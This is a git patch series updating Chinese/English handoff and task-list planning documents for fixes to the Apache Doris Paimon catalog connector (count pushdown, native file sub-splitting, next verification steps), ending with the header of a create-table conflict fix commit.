P3 coverage gaps (verify, not fix) — FIX-HMS-CONFRES re-check, DDL write parity, ANALYZE/column-stats, split-count accounting, cross-connector follow-ups. - task-list #9 commit hash finalized; HANDOFF overwritten. Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 96 ++++++++++++------------ plan-doc/task-list-P5-rereview2-fixes.md | 4 +- 2 files changed, 50 insertions(+), 50 deletions(-) diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index a8fc044de7f08b..30ea28960d3770 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -5,74 +5,74 @@ --- -# 🎯 下一个 session 的任务 — **逐一修复 paimon connector 第二轮 review 的问题(#1~#7 已完成 → 从 #8 起)** +# 🎯 下一个 session 的任务 — **P2 全清;进入 P3 覆盖缺口核查(去查,非 fix)** 第二轮 clean-room 对抗 review report:[`plan-doc/reviews/P5-paimon-rereview2-2026-06-11.md`](./reviews/P5-paimon-rereview2-2026-06-11.md)。 -👉 **任务清单(按优先级):[`plan-doc/task-list-P5-rereview2-fixes.md`](./task-list-P5-rereview2-fixes.md)** —— 逐条含 finding 引用、连接器 `file:line`、legacy parity 锚、fix sketch、SPI 影响、测法。 - -## ✅ 已完成(P0 BLOCKER 全清 + P1 MAJOR #5/#6/#7 全清) -- **#1 `FIX-URI-NORMALIZE`**(B-7DF/DV)`20b19d19dd8` —— native 数据文件 + DV 路径 scheme 归一化。新 SPI `ConnectorContext.normalizeStorageUri`。 -- **#2 `FIX-STATIC-CREDS-BE`**(B-9)`d23d5df9914` —— 静态 object-store 凭据→BE canonical `AWS_*`。新 SPI `ConnectorContext.getBackendStorageProperties`。 -- **#3 `FIX-SCHEMA-EVOLUTION`**(B-1a;M-10 deferred)`667f779af04` —— 连接器直建 thrift schema 字典(Design C,零新 SPI)。 -- **#4 `FIX-JDBC-DRIVER-URL`**(B-8a + B-8b)`2d15b1b7ed7` —— driver_url resolve+别名+CREATE-time 校验(纯连接器,零新 SPI;[D-050]/[DV-028]/[DV-029])。 -- **#5 `FIX-MAPPING-FLAG-KEYS`**(M-crit)`9dcf6d1a9e5` —— 连接器读 canonical 点分 mapping-flag 键(纯连接器,零 SPI;paimon-only,hive/iceberg 登 [DV-030])。 -- **#6 `FIX-KERBEROS-DOAS`**(M-8 + M-11)`2b1442fa57a` —— M-8 fe-core fs/jdbc authenticator 接线 + M-11 全 read RPC 包 `executeAuthenticated`(full legacy parity [D-052]/[D-053];DLF 从句证伪 overstated;[DV-031])。 -- **#7 `FIX-FORCE-JNI-SCANNER`**(M-1;本 session)`05132a42668` —— 见下。 - -### #7 摘要(本 session)`FIX-FORCE-JNI-SCANNER` —— commit `05132a42668` -- **根因**:翻闸连接器 split router 只读 NAME 派生的 `paimonHandle.isForceJni()`(binlog/audit_log 名钉),**从不**读 session var `force_jni_scanner` → ORC/Parquet 永走 native;legacy 的 JNI 逃生舱(`SET force_jni_scanner=true`,用于绕 native-reader bug 含 B2 schema-evolution 那类)静默丢失。连接器只移植 legacy 三 conjunct 中的两个(`PaimonScanNode.java:430`:`!forceJniScanner && !forceJniForSystemTable && supportNativeReader`),丢的 `!forceJniScanner` 即 M-1。 -- **修**(纯连接器、**零 SPI**、无 fe-core import、无 BE param —— legacy 也不序列化此 var): - - 新 `isForceJniScannerEnabled(session)`:逐字镜像 `isCppReaderEnabled`,读 key `force_jni_scanner`(byte-identical to `SessionVariable.FORCE_JNI_SCANNER`,同 `VariableMgr.toMap` 通道);null-guard,默认 false(legacy 默认)。 - - **Site A**(correctness,`PaimonScanPlanProvider.java:295`):`shouldUseNativeReader` 加显式 `forceJniScanner` 形参(1:1 镜像 legacy 三-boolean 闸),`planScan` 传 `isForceJniScannerEnabled(session)`。**handle 名钉是 OR-sibling,绝不替换**(binlog/audit_log 路由不变)。 - - **Site B**(correctness-NEUTRAL,`:436`):force-JNI 时抑制 native-only `paimon.schema_evolution` 字典(BE 仅在 native ORC/Parquet range 消费它,JNI/cpp reader 全忽略——核 `paimon_reader.cpp:51-54,188-191` / `file_scanner.cpp:1045-1058`);对齐连接器自身注释契约。 -- **关键设计定夺(本 session,内部工程判断,无须用户签字)**:`shouldUseNativeReader` 用**显式 3rd 形参**而非 call-site OR——**推翻 workflow synthesizer 的 call-site-OR 建议,采 legacy-parity scout**。理由:`force_jni_scanner` 是与既有 `forceJni`(=`forceJniForSystemTable`)语义并列的**路由**输入(legacy `:430` 即两 sibling boolean 同闸),call-site OR 会让新维度只能经 helper 的**字符串解析**测,而那测**routing 逻辑变了也不会红**(违 Rule 9);3rd 形参让 `shouldUseNativeReader(false, true, native-eligible)==JNI` 成 mutation-tested 事实。`cppReader=isCppReaderEnabled(session)`(序列化格式 flag,非路由)不是正确类比。 -- **验证**:连接器模块 **250/0/0**(1 CI-gated live skip = `PaimonLiveConnectivityTest`)、import-gate 净、checkstyle 0;**fail-before 双向红**(neuter 丢 conjunct + helper return-false → 恰两新测红、其余 31 绿)。真 BE reader 选择 = **live-e2e only**(无离线 harness 驱动 BE reader 选择)。设计 [`P5-fix-FORCE-JNI-SCANNER-design.md`](./tasks/designs/P5-fix-FORCE-JNI-SCANNER-design.md)。 -- **Site B 测覆盖诚实声明**(Rule 12):emit-suppression **无专属离线 red 测**——`buildSchemaEvolutionParam` 需真 `FileStoreTable`+`SchemaManager`,离线 harness 只有 `FakePaimonTable`(恒返空字典),故撤 Site B 闸不会红任何离线测。Site B 由:① 共享 `isForceJniScannerEnabled` helper 测(其唯一变量项)② BE-源 correctness-neutral 证据 ③ CI-gated live-e2e 覆盖。 - -## 🔜 下一个 session:从 **#8 `FIX-COUNT-PUSHDOWN`** 起 —— ⚠️ **P2 严重度有争议,动手前先问用户定 scope** -> ⚠️ **先拿当前代码复核 finding**(review 只读,行号已漂移;#7 改过 `PaimonScanPlanProvider`,#3/#4/#6 亦改过 scan provider/metadata)。 - -**#8 `FIX-COUNT-PUSHDOWN`(M-2,round-2=MAJOR / round-1=MINOR,perf-parity)**: -- **根因**:`COUNT(*)` 下推对该 node **仍 ENABLED**(`PhysicalPlanTranslator.java:873`),但连接器**从不**算 `mergedRowCount` 也不 emit `paimon.row_count` → `table_level_row_count=-1` → BE 回退(`paimon_jni_reader.cpp:104`、`file_scanner.cpp:1298-1326`)**物化 merge 后全行**去 count(PK 表 merge/delete 尤贵)。**结果正确,仅性能回归。** -- **连接器**:`PaimonScanPlanProvider.java:186-296`(无 count 分支)。**legacy**:`source/PaimonScanNode.java:396,421-429,483-495,303-308`(`applyCountPushdown` + `dataSplit.mergedRowCount()`,在 native/JNI 闸**之前**短路)。 -- **#9 `FIX-NATIVE-SUBSPLIT`(M-3,同 perf-parity)**:一个 split/RawFile,大 ORC/Parquet 单 scanner;`PaimonScanPlanProvider.java:263-286` vs `source/PaimonScanNode.java:434-465`(`determineTargetFileSplitSize`+`fileSplitter.splitFile`)。 -- ⚠️ **#8/#9 都是结果正确、仅 perf/并行** → **动手前用 `AskUserQuestion` 找用户定 scope**(accept-or-defer;defer 则登 `deviations-log.md`,**勿**默认实现)。这与 #7(明确 MAJOR、无歧义、直接修)不同。 - -每条遵循项目既定 per-fix 流程(`step-by-step-fix` skill):1) 设计 doc → `plan-doc/tasks/designs/P5-fix--design.md`;2) **先拿当前代码复核 finding**;3) 实现(minimal、surgical、**连接器禁 import fe-core**);4) build+UT(绝对 `-f`、**`-am`** 必带、读 surefire XML + `MVN_EXIT`、加 fail-before/pass-after UT);5) **独立 commit**;6) SPI 改动登 `01-spi-extensions-rfc.md`、用户签字入 `decisions-log.md`、偏差入 `deviations-log.md`、同步 task-list。 +👉 **任务清单:[`plan-doc/task-list-P5-rereview2-fixes.md`](./task-list-P5-rereview2-fixes.md)** —— #1~#9 **全部完成**。 + +## ✅ 已完成(P0 BLOCKER + P1 MAJOR + P2 perf-parity 全清) +- **#1 `FIX-URI-NORMALIZE`** `20b19d19dd8` · **#2 `FIX-STATIC-CREDS-BE`** `d23d5df9914` · **#3 `FIX-SCHEMA-EVOLUTION`** `667f779af04` · **#4 `FIX-JDBC-DRIVER-URL`** `2d15b1b7ed7`(P0 全清) +- **#5 `FIX-MAPPING-FLAG-KEYS`** `9dcf6d1a9e5` · **#6 `FIX-KERBEROS-DOAS`** `2b1442fa57a` · **#7 `FIX-FORCE-JNI-SCANNER`** `05132a42768`(P1 全清) +- **#8 `FIX-COUNT-PUSHDOWN`**(M-2)`525be03371c` —— 见下。 +- **#9 `FIX-NATIVE-SUBSPLIT`**(M-3)`2f5f467f53d` —— 见下。 + +### #8 摘要 `FIX-COUNT-PUSHDOWN` — commit `525be03371c`([D-054]/[DV-032]/[RFC §25 E15]) +- **根因**:翻闸 plugin paimon `COUNT(*)` 结果正确但慢。recon(`wf_1ce48c93-325`):emit 缝(`PaimonScanRange.Builder.rowCount`→`paimon.row_count`→`setTableLevelRowCount`)+ COUNT 枚举→BE(`toThrift:90`/`PhysicalPlanTranslator:873`)**已建全**;唯缺**信号+计算**——`mergedRowCount()` 是 SDK-only(连接器算),COUNT 信号 `getPushDownAggNoGroupingOp()==COUNT` 只在 fe-core 节点、无人读 → 每 split 发 `-1` → BE 物化全行去 count。 +- **⚠️ 非纯连接器(更正动手前 framing)**:信号须过 SPI。**用户签字 proceed + SPI 改 + collapse-to-one**。修=3 文件:SPI `ConnectorScanPlanProvider` +1 default 7-arg `planScan(...,boolean countPushdown)`(委托 6-arg,其余连接器 no-op,[E15]);fe-core `PluginDrivenScanNode.getSplits` 读 agg-op 传入;连接器 `planScanInternal` count 短路第一臂 + `isCountPushdownSplit` + `buildCountRange`(**collapse-to-one**=legacy `<=10000` 路径普遍化)。legacy `>10000` 并行 trim 有意丢=[DV-032]。 +- **review `wf_6ead7c2c-b58`**:1 MAJOR(单-split 测 degenerate)已修→2-partition 非对称(2+3=5)fixture 钉 collapse+sum;2 MINOR 驳回。守门:连接器 252/0/0、fe-core compile+checkstyle 0、fail-before 恰 2 新测红。 + +### #9 摘要 `FIX-NATIVE-SUBSPLIT` — commit `2f5f467f53d`([D-055]/[DV-033],纯连接器零 SPI/零 fe-core) +- **根因**:大 native ORC/Parquet 文件得一个 scanner(无文件内并行);连接器每 RawFile 发整文件 range,legacy 经 `FileSplitter.splitFile` 切。recon(`wf_ad764bf6-1c9`):真 gap(ORC/Parquet PLAIN 可切);**DV×sub-split 安全**(DV rowid 全局行位、BE 部分 range 仍报全局位、`_kv_cache` 按 path+offset 共享、iceberg 同机制→**同一 DV 附每个 sub-range 不 re-base**);**纯连接器**(切分 math 5 session var via VariableMgr.toMap、连接器禁 import FileSplitter)。 +- **修=1 连接器文件**:2 纯静态 `computeFileSplitOffsets`(逐字移植含 **`>1.1D` 尾吸收 guard**)+ `determineTargetSplitSize`(移植 determineTargetFileSplitSize+applyMaxFileSplitNumLimit,省 isBatchMode→0)+ `sessionLong`/lazy `resolveTargetSplitSize` + native 臂 `buildNativeRanges` 内层 loop + `buildNativeRange(+start,+length)`。**count-pushdown splittable 闸**:非 count-eligible 的 native split 在 count pushdown 下保**整文件**(target=0,legacy `splittable=!applyCountPushdown` parity)。 +- **review `wf_4ac7479d-39d`**:2 confirmed 已修(① MINOR count-pushdown sub-split parity gap+假注释→加 count-pushdown 整文件闸;② MAJOR 缺 DV-on-every-sub-range 测→抽 `buildNativeRanges` + 测);2 驳回。守门:连接器 258/0/0、checkstyle 0、import-gate 净、fail-before 3 splitting 测红 + DV-only-first 测红。split-weight 调度 nicety 不移植(pre-existing)=[DV-033]。 + +## 🔜 下一个 session:**P3 覆盖缺口核查("去查",非 fix;查出真分歧才转 FIX)** +task-list §P3(completeness critic 标本轮未追): +1. **VERIFY `FIX-HMS-CONFRES`**:round-2 未复测 `hive.config.resources`/hive-site.xml 下流到 BE-facing scan props(round-1 MAJOR 的修)。确认到达 `getScanNodeProperties`(HMS/DLF)。 +2. **TRACE DDL 写路径 parity**:`PaimonConnectorMetadata.{createTable,dropTable,createDatabase,dropDatabase}`(`:683-797`) vs legacy `PaimonMetadataOps`;branch/tag DDL 写;IF-(NOT-)EXISTS 短路、editlog/cache-refresh 序、error-code parity。 +3. **TRACE ANALYZE/列统计**:`ExternalAnalysisTask`/`getColumnStatistic` parity(fetchRowCount 已核实忠实)。 +4. **CHECK split-count 计账**(`SqlBlockRuleMgr` 限额、batch-mode)—— 现 #9 已落 sub-split,复核 split 计数喂 SqlBlockRuleMgr 是否仍对([[catalog-spi-plugindriven-explain-override-gap]] 提过 split-count 须 startSplit+getSplits 两路设)。 +5. **跨连接器 follow-up**([DV-028]/[DV-030]/[DV-031])—— hudi/iceberg 同根因缝,将来批量 close(非本轮)。 + +⚠️ **P3 是「去查」不是「去改」**:查出真分歧 → AskUserQuestion 定是否转 FIX;否则记录「已核实 parity」即可。 +> P4 MINOR/NIT(review §5):一次性 cleanup;唯一真实数据边 = partition null-sentinel(`__HIVE_DEFAULT_PARTITION__`/`\N` 字面值被当 NULL)。 + +每条遵循 per-fix 流程(`step-by-step-fix` skill):设计 doc → 先拿当前代码复核 finding → 实现(连接器禁 import fe-core)→ build+UT(绝对 `-f`、**`-am`** 必带、读 surefire XML + `MVN_EXIT`、fail-before/pass-after)→ 独立 commit → SPI 改登 RFC + 用户签字入 decisions-log + 偏差入 deviations-log + 同步 task-list。 ## 📋 优先级总览(详见 task-list) | 层 | 条目 | 说明 | |---|---|---| -| **P0 BLOCKER(挡 commit)** | ✅1.URI-NORMALIZE · ✅2.STATIC-CREDS-BE · ✅3.SCHEMA-EVOLUTION · ✅4.JDBC-DRIVER-URL | **全清** | -| **P1 MAJOR(修或显式接受)** | ✅5.`FIX-MAPPING-FLAG-KEYS` · ✅6.`FIX-KERBEROS-DOAS` · ✅7.`FIX-FORCE-JNI-SCANNER` | **全清**。#7 纯连接器零 SPI,3rd-param 推翻 synthesizer call-site-OR(Rule 9),Site B correctness-neutral。 | -| **P2 严重度有争议(perf;R1=MINOR)** | ⬜8.`FIX-COUNT-PUSHDOWN`(M-2) · ⬜9.`FIX-NATIVE-SUBSPLIT`(M-3) | 结果正确仅性能/并行。**动手前先 `AskUserQuestion` 定 scope**(accept-or-defer,defer 则登 `deviations-log`)。 | -| **P3 覆盖缺口(去查)** | 复验 `FIX-HMS-CONFRES` · DDL 写路径 parity · ANALYZE/列统计 · split-count 计账 · 跨连接器 follow-up([DV-028]/[DV-030]/[DV-031]) | critic 标本轮未追;查出真分歧才转 FIX。 | -| **P4 MINOR/NIT** | 见 review §5 | 一次性 cleanup;唯一真实数据边 = partition null-sentinel(`__HIVE_DEFAULT_PARTITION__`/`\N` 字面值被当 NULL)。 | +| **P0 BLOCKER** | ✅1·✅2·✅3·✅4 | **全清** | +| **P1 MAJOR** | ✅5·✅6·✅7 | **全清** | +| **P2 perf-parity** | ✅8.`FIX-COUNT-PUSHDOWN` · ✅9.`FIX-NATIVE-SUBSPLIT` | **全清**(#8 SPI+collapse-to-one;#9 纯连接器 sub-split)。各经 4-scout recon + 对抗 review,均揪出真 finding 已修。 | +| **P3 覆盖缺口(去查)** | ⬜ FIX-HMS-CONFRES 复验 · DDL 写 parity · ANALYZE · split-count 计账 · 跨连接器 follow-up | **下一个 session 起**。查出真分歧才转 FIX。 | +| **P4 MINOR/NIT** | 见 review §5 | 一次性 cleanup;partition null-sentinel 是唯一真实数据边。 | --- # 📦 仓库状态 -- **HEAD = 本 checkpoint commit**(更新 task-list #7 进度+hash、HANDOFF)。其父 = `05132a42668`(`fix: FIX-FORCE-JNI-SCANNER`,本 session #7)。该 fix commit = 连接器(1 main+1 test)+设计 doc(3 文件,无 regression-conf/scratch/HANDOFF)。 -- ⚠️ **`regression-test/conf/regression-conf.groovy` 仍 modified-未 commit 且含明文 Aliyun key** —— 任何 commit 前继续 path-whitelist,**严禁 `git add -A`**。`regression-conf.groovy.bak` 同理排除。 +- **HEAD = `2f5f467f53d`**(`fix: FIX-NATIVE-SUBSPLIT` #9)。其父 = `525be03371c`(#8 COUNT-PUSHDOWN)。**注意**:本 session 未单独打 `docs: checkpoint` commit——#8/#9 的 task-list/decisions/deviations/RFC/HANDOFF 已**折入各自 fix commit**(#9 fix commit 含 HANDOFF 外的全部 doc + #8 hash finalize)。本 HANDOFF 更新**未 commit**(下个 session 或现在可单独 `docs:` 提)。 +- ⚠️ **`regression-test/conf/regression-conf.groovy` 仍 modified-未 commit 且含明文 Aliyun key** —— commit 前继续 path-whitelist,**严禁 `git add -A`**。`regression-conf.groovy.bak` 同理排除。 - scratch 仍未 commit(`.audit-scratch/` `conf.cmy/` `META-INF/`)。 -- 当前分支 `catalog-spi-07-paimon`(非 `master`)→ 在此 commit 修复 OK。 +- 当前分支 `catalog-spi-07-paimon`(非 `master`)。 - **legacy `datasource/paimon/*` 仍在树内**(B8 删除未做)→ 每个 fix 都能 side-by-side diff 做 parity。 -- 迁移链:…→`9dcf6d1a9e5`(#5)→`2b1442fa57a`(#6 KERBEROS-DOAS)→`05132a42668`(#7 FORCE-JNI-SCANNER)→本 checkpoint(HEAD)。 +- 迁移链:…→`05132a42768`(#7)→`525be03371c`(#8 COUNT-PUSHDOWN)→`2f5f467f53d`(#9 NATIVE-SUBSPLIT, HEAD)。 ## ⚠️ Commit 须知(任何 `git add` 前必读) - **硬前置**:scrub `regression-test/conf/regression-conf.groovy`(明文 Aliyun key)+ 清 scratch(`.audit-scratch/` `conf.cmy/` `META-INF/` `*.bak`)。**path-whitelist `git add`,严禁 `git add -A`。** - 每个 fix 独立 commit;message = `fix: ` + 根因 + 解法 + 测试,末尾带 `Co-Authored-By: Claude Opus 4.8 (1M context) `。 -- 改 fe-core/SPI 的 fix:commit 须含连接器 + fe-core 两侧 + 测试。#7 纯连接器,单侧。 +- 改 fe-core/SPI 的 fix:commit 须含连接器 + fe-core 两侧 + 测试(#8 即如此:SPI api + fe-core + 连接器)。#9 纯连接器单侧。 ## ⚙️ 操作须知(复用) -- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : **-am** -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`;验证读 surefire XML + `MVN_EXIT`([[doris-build-verify-gotchas]])。**`-am` 必带**。`-pl :fe-connector-paimon -am` **不重编 fe-core**;改 fe-core 须单独 `-pl :fe-core -am`。**checkstyle**:连接器模块可单独 `mvn -pl :fe-connector-paimon checkstyle:check`(#7 已用,exit 0 即净);fe-core checkstyle 绑在其 `test` build(neuter 须 checkstyle-clean)。 +- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : **-am** -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`;验证读 surefire XML + `MVN_EXIT`([[doris-build-verify-gotchas]])。**`-am` 必带**(漏则报 `could not resolve fe-connector ${revision}` 假错)。改 fe-core 须单独 `-pl :fe-core -am`。**checkstyle**:连接器 `mvn -pl :fe-connector-paimon checkstyle:check`(exit 0 即净);fe-core `mvn -pl :fe-core checkstyle:check`。 - 连接器禁 import fe-core:`bash tools/check-connector-imports.sh`(仅允许 `org.apache.doris.{thrift,connector,extension,filesystem}`)。 - cwd 跨 Bash 调用持久,`cd` 破相对路径 → 一律绝对路径。 -- 测试优先 runnable FE **单测**(连接器 harness:`RecordingConnectorContext`/`RecordingPaimonCatalogOps`/`FakePaimonTable`/`PaimonScanPlanProviderTest`;离线**无 FileStoreTable**——`FakePaimonTable.newReadBuilder()` 抛、`buildSchemaEvolutionParam` 返空,故 native-path/schema-dict emit 的正向路径不可离线驱动,纯静态 seam(`shouldUseNativeReader`/`isForceJniScannerEnabled`)才可测);live-e2e CI-gated → 注明 gated,勿谎称跑过。 +- 测试优先 runnable FE 单测(harness:`RecordingConnectorContext`/`RecordingPaimonCatalogOps`/`FakePaimonTable`/`PaimonScanPlanProviderTest`)。**关键**:`FakePaimonTable.newReadBuilder()` 抛 → 纯静态 seam(`shouldUseNativeReader`/`isForceJniScannerEnabled`/`isCountPushdownSplit`/`computeFileSplitOffsets`/`determineTargetSplitSize`/`buildNativeRanges`)才离线可测;但**真 `DataSplit` 可经 `buildRealDataSplit`/inline FileSystemCatalog 离线构造**(#8/#9 end-to-end 测即用之:PK 表 count、append-only 表 sub-split)。live-e2e CI-gated → 注明 gated,勿谎称跑过。 ## 🧠 给下一个 agent 的 meta -- **#7 验证的高价值模式(再次奏效)**:finding → **4-scout + 对抗 synthesizer workflow 独立复核**(sites / legacy-parity / session-plumbing / BE+test-safety)→ 设计 → 实现 → **fail-before 实测**(neuter conjunct+helper、跑测、双向红)→ pass-after。**本次关键:复核 synthesizer 自身的判断**——synthesizer 选 call-site-OR(求最小 churn),但 legacy-parity scout 选 3rd-param(求 routing 可 mutation-test);我**站 scout 推翻 synthesizer**(Rule 9:测须能在 routing 逻辑变时红)。教训=**别盲从 synthesizer,交叉核其理由**。 -- **改 fe-core handle/scan 流前,先 grep 全 `metadata.getTableHandle` / scan-node 调用方**(历史教训)。#7 纯连接器无此风险。 -- **#8/#9 = P2 perf-parity,severity 有争议 → 动手前先 `AskUserQuestion` 定 scope**(与 #7 无歧义直接修不同)。accept→修;defer→登 `deviations-log` 勿默认实现。 -- **跨连接器 follow-up 累积**:[DV-028](#4 CREATE-time-only 校验)+ [DV-030](#5 mapping-flag 键)+ [DV-031](#6 read-vs-DDL doAs + 翻闸-authenticator-wiring)—— 三者同属「新连接器读法/翻闸 vs fe-core 既有约定」类缝,hudi/iceberg 同样复发,将来批量 close。#7 无新增 DV(full parity,Site B 是连接器自有非 legacy 偏差)。 +- **#8/#9 验证的高价值模式(再次奏效)**:finding → **多-scout recon workflow + 对抗 synthesizer**(决定 pure-connector vs needs-SPI、DV 安全性等 gating 问题)→ 设计 doc → 实现 → **fail-before 实测**(neuter helper、双向红)→ pass-after → **独立 commit 前再跑对抗 review workflow**。**两次 review 都揪出真 finding**:#8 review 抓出我自己的测 degenerate(单-split fixture 让 collapse/sum 断言失效);#9 review 抓出 count-pushdown sub-split parity gap(我设计 doc 的假"无 interaction"声明)+ 缺 DV-on-every-sub-range 测。**教训:commit 前的对抗 review 对 test-rigor + 自身设计假设的证伪价值极高,勿跳过。** +- **#8 关键定夺**:连接器无法见 agg-op(per-query planner 输出非 session var)→ 必须过 SPI(否决 session-channel hack);collapse-to-one = legacy `<=10000` 普遍化。 +- **#9 关键定夺**:DV×sub-split 安全(全局行位);count-pushdown 下 native split 保整文件(legacy `splittable=!applyCountPushdown`);纯静态 math seam 可离线 mutation-test,真 DataSplit 经 inline FileSystemCatalog 可离线 end-to-end。 +- **P3 是核查不是改**:先拿当前代码复核(行号已大漂移,#3/#4/#6/#7/#8/#9 都改过 scan provider / metadata),查出真分歧再 AskUserQuestion 定 scope。 +- **跨连接器 follow-up 累积**:[DV-028]/[DV-030]/[DV-031](read 法/翻闸 vs fe-core 约定)+ [DV-032](count collapse parallel-trim)+ [DV-033](native split-weight nicety)—— hudi/iceberg full-adopter 同复发,将来批量 close。 diff --git a/plan-doc/task-list-P5-rereview2-fixes.md b/plan-doc/task-list-P5-rereview2-fixes.md index 75efdcb692279e..252793d7c424af 100644 --- a/plan-doc/task-list-P5-rereview2-fixes.md +++ b/plan-doc/task-list-P5-rereview2-fixes.md @@ -31,7 +31,7 @@ | 6 | FIX-KERBEROS-DOAS | MAJOR | M-8 + M-11 | M-8: wire HDFS authenticator for fs/jdbc (fe-core); M-11: wrap ALL read RPCs in `executeAuthenticated` (connector, full legacy parity) | no³ | ✅ | ✅ | ✅ 248/0/0 + 21/0/0 | ✅ `2b1442fa57a` | | 7 | FIX-FORCE-JNI-SCANNER | MAJOR | M-1 | honor `force_jni_scanner` session var on connector scan | no | ✅ | ✅ | ✅ 250/0/0 | ✅ `05132a42668` | | 8 | FIX-COUNT-PUSHDOWN | MAJOR* | M-2 | FE-computed `mergedRowCount` / `paimon.row_count` (perf); SPI count-pushdown overload + fe-core forward + connector collapse-to-one | **yes** | ✅ | ✅ | ✅ 252/0/0 + fe-core | ✅ `525be03371c` | -| 9 | FIX-NATIVE-SUBSPLIT | MAJOR* | M-3 | native ORC/Parquet sub-file splitting (parallelism); connector-side port of FileSplitter + determineTargetFileSplitSize | no | ✅ | ✅ | ✅ 258/0/0 | 🔄 pending | +| 9 | FIX-NATIVE-SUBSPLIT | MAJOR* | M-3 | native ORC/Parquet sub-file splitting (parallelism); connector-side port of FileSplitter + determineTargetFileSplitSize | no | ✅ | ✅ | ✅ 258/0/0 | ✅ `2f5f467f53d` | `sev*` = round-2 rated MAJOR but round-1 rated **MINOR** (perf-only, correct results) — **user decides severity** (see §P2). ³ #6 SPI corrected `maybe`→**`no`** ([D-052](./decisions-log.md)/[D-053](./decisions-log.md)): M-11 is connector-only (wraps existing `ConnectorContext.executeAuthenticated`, full legacy parity per signed [D-052], superseding the D7=B read-path clause). M-8 adds an **internal fe-core hook** `MetastoreProperties.initExecutionAuthenticator(List)` (default no-op, wired in `PluginDrivenExternalCatalog`) — **not** connector SPI (`ConnectorContext`/`Connector` surface unchanged), so 01-spi-extensions-rfc.md is not touched. Scope = filesystem+jdbc only (DLF/REST/HMS excluded, "DLF" clause overstated). True end-to-end doAs is live-Kerberos-e2e only ([DV-031](./deviations-log.md)). @@ -112,7 +112,7 @@ Legend: ⬜ todo / 🔄 in progress / ✅ done - **Gates:** connector 252/0/0 (1 CI-gated live skip), fe-core compile + checkstyle 0, import-gate clean, **fail-before exactly the 2 new tests red** (neuter `isCountPushdownSplit`→false), end-to-end real-local-PK-table test asserts collapse-to-one carrying the merged total (2). Real BE CountReader selection = CI-gated live-e2e (legacy paimon count regression covers the BE contract; no BE change). ### 9. FIX-NATIVE-SUBSPLIT — native sub-file splitting lost (M-3) -- **✅ DONE** (commit pending; design [`P5-fix-NATIVE-SUBSPLIT-design.md`](./tasks/designs/P5-fix-NATIVE-SUBSPLIT-design.md), [D-055](./decisions-log.md), [DV-033](./deviations-log.md)). User signed off (2026-06-12): **implement now**. +- **✅ DONE** `2f5f467f53d` (design [`P5-fix-NATIVE-SUBSPLIT-design.md`](./tasks/designs/P5-fix-NATIVE-SUBSPLIT-design.md), [D-055](./decisions-log.md), [DV-033](./deviations-log.md)). User signed off (2026-06-12): **implement now**. - Recon (`wf_ad764bf6-1c9`): real gap (ORC/Parquet are PLAIN/splittable, legacy *does* sub-split); DV × sub-split is **SAFE** (DV rowids are global file positions; BE readers report global positions in a partial range; same DV on every sub-range, no offset re-basing, no guard); **pure-connector, zero SPI, zero fe-core** (the splitter math + 5 session vars re-stated with plain longs; only the specified-size `FileSplitter` branch is reachable). - **Fix (1 file):** connector `PaimonScanPlanProvider` — 5 file-split session-var constants, 2 pure statics (`computeFileSplitOffsets` byte-exact port incl. the `>1.1D` tail guard; `determineTargetSplitSize` = `determineTargetFileSplitSize` + `applyMaxFileSplitNumLimit`, batch branch omitted), `sessionLong` + lazy `resolveTargetSplitSize`, native-arm sub-split loop, `buildNativeRange(+start,+length)`. - **Gates:** connector 258/0/0 (1 CI-gated live skip), checkstyle 0, import-gate clean, **fail-before exactly the 3 splitting tests red** (neuter `computeFileSplitOffsets`→single range), end-to-end append-only fixture (small `file_split_size` → ≥2 contiguous sub-ranges tiling `[0,fileLength)`; default → 1 range). split-weight scheduling nicety not ported (pre-existing) → [DV-033]. Real BE multi-range + DV read = CI-gated live-e2e (legacy paimon regression covers the BE contract; no BE change). From ea0da520a0e768ec5012c012f51b2be1ae882ed3 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 12 Jun 2026 12:34:58 +0800 Subject: [PATCH 031/128] =?UTF-8?q?fix:=20FIX-CREATE-TABLE-LOCAL-CONFLICT?= =?UTF-8?q?=20=E2=80=94=20restore=20legacy=20local-conflict=20rejection=20?= =?UTF-8?q?in=20PluginDrivenExternalCatalog.createTable?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: the generic fe-core bridge PluginDrivenExternalCatalog.createTable collapsed legacy PaimonMetadataOps.performCreateTable's ordered remote-then-local existence probe into a single `exists` OR that was consumed ONLY by the IF NOT EXISTS branch. The !IF NOT EXISTS path ignored it and unconditionally called metadata.createTable. So a table present only in the local FE cache (a case-variant folded onto an existing name under lower_case_meta_names, absent on a case-sensitive remote) was CREATED remotely instead of rejected with ERR_TABLE_EXISTS_ERROR -- silent metadata corruption. Found by the P3 plugin-vs-legacy parity audit (adversarially verified); narrow, backend-dependent trigger (filesystem/jdbc paimon; HMS lowercases so both sides reject). Generic bridge -> also affects MaxCompute / future iceberg/hudi. Solution (fe-core bridge only; zero SPI/connector/BE): split the `exists` OR into remoteExists/localExists; under !IF NOT EXISTS, when localExists is true throw ERR_TABLE_EXISTS_ERROR (legacy local-arm parity). A remote-only conflict still falls through to connector.createTable (case A unchanged). Option-2 surgical (D-056); the residual case-A / all-DDL-op generic-error-code collapse is pre-existing and out of scope (DV-034). Tests: new PluginDrivenExternalCatalogDdlRoutingTest .testCreateTableLocalConflictWithoutIfNotExistsRejects (local-hit + remote-miss + !IF NOT EXISTS -> asserts DdlException thrown + metadata.createTable never called + no edit log). fail-before: exactly 1 new test red ("Expected DdlException...nothing was thrown"); pass-after: 26/0/0. fe-core checkstyle 0. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../PluginDrivenExternalCatalog.java | 30 ++- ...inDrivenExternalCatalogDdlRoutingTest.java | 36 ++++ plan-doc/decisions-log.md | 11 ++ plan-doc/deviations-log.md | 13 +- plan-doc/task-list-P5-rereview2-fixes.md | 19 +- ...-fix-CREATE-TABLE-LOCAL-CONFLICT-design.md | 179 ++++++++++++++++++ 6 files changed, 272 insertions(+), 16 deletions(-) create mode 100644 